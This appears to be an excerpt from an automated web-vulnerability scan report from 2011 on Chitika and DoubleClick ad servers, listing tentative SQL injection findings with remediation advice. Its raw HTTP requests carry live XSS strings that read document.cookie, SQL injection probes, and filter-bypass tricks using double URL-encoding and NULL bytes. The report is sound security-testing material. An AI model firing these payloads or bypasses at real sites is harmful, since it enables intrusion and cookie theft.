Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:28 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXWckqgQj0XDDSYJM4fZ/UN5/pNoUWjY2UStRAsZ8z+UER5ssfI1MfMTt/HEA+fUJ+mJOUAA27n1jL4aNT6t45eInqrtq/te5yFu/4TgWJgPF3lanaA/WQL0hGR4YNn40OphE1cqtxFAiYkM1oYqHQjxQc7aTwAKpHz+B9MDKPLyrxntwh3/i2mJX5Nc/Q90Zv2UrsgXZTlZb8We5HR60n1BuMzOoS0f2BaCmBktIv0KuD7JiPQ8vvPW3a/RSzF+w+ieyhBpSZyayzNgFIk3CxJ1Er4t1IIZN5fMORUpiILRivZqer79VNpU3Z7/GIz5YXjdAKpV/kZh2ArN9FGGu9PQbNss3p1F+wvGCxJwowXASlEVIlb3eIZsCuDbU6YuQ8/JIpoTrl77tvTTezvSiw3n4w6Ya.XCrCvBdO0LVqEPsFqbfYvA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 20057

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,gofreemanuals.
...[SNIP]...

1.5. http://mm.chitika.net/minimall [cl_site_link parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The cl_site_link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cl_site_link parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cl_site_link request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:04 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/Sk5qAFuhB59X9RSPW7cuX5BjLSsC03SVEk82l5MNAgAnNo673eS84tAp+za0YwsMeVekfsK3TP/Q67SgdYA8R1yGFrOkUNg1YOW6xDpzwv0dIL7C1mtDBX5no1JyUMKe8U3R9rTsUHae6xXoN/s0UNSnTBaZ8fZflGHPQmUQxQUYIEHm6oTR8fvN3CXOlCU2UpUdtl27oFWaqtfb6hy/xbC9QJl10w3q4RBKj7+JgNtLTCNbQ8+PfOMxQTyn2+gtbV0Ex4pGqbu1+Su95/0Ux9LNQV3gAFKht8/dyPjYc1vXOdQM6f5RSsm2cAFg3w0MGJlUU0EnLblOfvdGvlyXWW3hOx3nmBQihS4AY7cPIByNTm+gmRP1z8LiMIj/Z61MsOvK5N4ha7ILE2hEdAzL9PG/IC4gLURn3j6xkza3w5TxLbEs7PEwgix1WJMMCz+ss753/VNwoZ7mUR7Hd7+MXThNjF7bUSSjs4R8MVkEdSyLgXeXdIl8Uwk61wqQ==.4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19038

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran
...[SNIP]...
gYZKPBN4JCKZoLQG8l5d70OEnJGhuQplXG%2FzRyTwAzRaGBLVM9lQz5Zr%2B4E92M6fWD2ZHc5UnKJZ8o%2BDEbw1CFsq%2B6QBonqYdQ0FLncw%3D%3D&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:04 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/Sk5qAFuhB59X9RSPW7cuX5BjLSsC03SVEk82l5MNAgAnNo673eS84tAp+za0YwsMeVekfsK3TP/Q67SgdYA8R1yGFrOkUNg1YOW6xDpzwv0dIL7C1mtDBX5no1JyUMKe8U3R9rTsUHae6xXoN/s0UNSnTBaZ8fZflGHPQmUQxQUYIEHm6oTR8fvN3CXOlCU2UpUdtl27oFWaqtfb6hy/xbC9QJl10w3q4RBKj7+JgNtLTCNbQ8+PfOMxQTyn2+gtbV0Ex4pGqbu1+Su95/0Ux9LNQV3gAFKht8/dyPjYc1vXOdQM6f5RSsm2cAFg3w0MGJlUU0EnLblOfvdGvlyXWW3hOx3nmBQihS4AY7cPIByNTm+gmRP1z8LiMIj/Z61MsOvK5N4ha7ILE2hEdAzL9PG/IC4gLURn3j6xkza3w5TxLbEs7PEwgix1WJMMCz+ss753/VNwoZ7mUR7Hd7+MXThNjF7bUSSjs4R8MVkEdSyLgXeXdIl8Uwk61wqQ==.4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 18984

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c
...[SNIP]...

1.6. http://mm.chitika.net/minimall [frm parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00'&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXe99hdD4N3Y8+hAWrbEPZjNgAYyxYDc25rnr3Ff/Paa9/v3eI79FPXJcaLozQcxdpm5MM6R4QaC6sE5VMlIyysjvzjIeQkglG+XihWzhr/fZli1zObbtcS6mSLQnjk03OgIAQN4xIi4OAGyaxsr2pmtcoIEdVFMLG1qU2DWdhwqZmSygSSW8QGDuC4HGJ0b/Z2L9NCigN44ppkm4HdKHuVwsMzOoS0f2BaGqdksKsUKux/kFVZeyXFieCY/ZQRCiGwnaR6ImPRDQS/lIoW6dtX5Qz5Rb81Og0A9uKOao57Q3ndpPaWNj96D/Lo5ssIaeclFQKZRjkZp2ArR9KuWy9vUbLvuxpGH6lkiTumvPM+RUBP96mw5RFlxP8EylO52TSis8TgwolY5Gg3BfKaaG0W/FJaYc.s/MiCuIckIOrG8DkvWNfiA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19194

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,pc-test.co
...[SNIP]...
O15H5daRJPBlH%2FSbzIHiQCsWSZWkQSTw3AHBTGHo9g6qLtBS5%2BaQXf3HvBBTCB%2ByzTytycqPwU82LaNRsvca1NL910pVw7nc3TO1IgGGuIAO2uYw&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00''&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:55 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJYTl4xB5DzWnjJsxKS7Ikiy5zkR+OaoC5I4yrnSj0IzYFdv/5xkL34IVVlNI21A6Tll5JhicLyDKsXHxiXt4czGm74ULKBQKIhvH/MR7vSf4QYfI2D5z9rB2Z3FWtfyCSbFkg+/5YfV1UiWFk065BW3/iEtfbUHQgfa9AKUmjhlaZ2g+R9ESfr/p556qQovpllZTUTJc0F++uYsY8Qk74sYaMk4USrbAjv+COiS68qoNWkMd/guT/ktJJLZK/zrOCBhqAsXvLRkFzPadj/K2xMcHN4dWHFZRV3BZrZ7bKC2RKEgmZiD+RwRBcENkbrDf3CJdWjceNmKAHA1/k22otNyfLQCaXrzBtVKb/Nbf1GV3oX1jQecjjMYUMcgxTopHYlTEQGKtzjJDEuSJES3gfiMRKJ/PD9kTDzerHB1s+qOnBw==.cHhmyQbUSBnRfZHEv3/FmA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19123

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c
...[SNIP]...

1.7. http://mm.chitika.net/minimall [output parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00'&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:04:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
PVs1K%2FWWKWj4SRWLTkFgHujJpdV3XGBUvGGVmufLsEHrxN1BF2EdMXYmwkjrUFCb6pj6q7cCdZ4w2lI6oh8%2B3wzEBnV6r0jlsUnfMFgXF14JaLfo%3D&template=v1-450xauto">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00''&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:04:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.8. http://pubads.g.doubleclick.net/gampad/ads [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The flash parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the flash parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d1--%20 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tipd.com/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 13:52:27 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2974

GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\
...[SNIP]...
= c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; jca=(9507)-(226)-(558); if (a=='aw0') {jca+=(-2656);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" 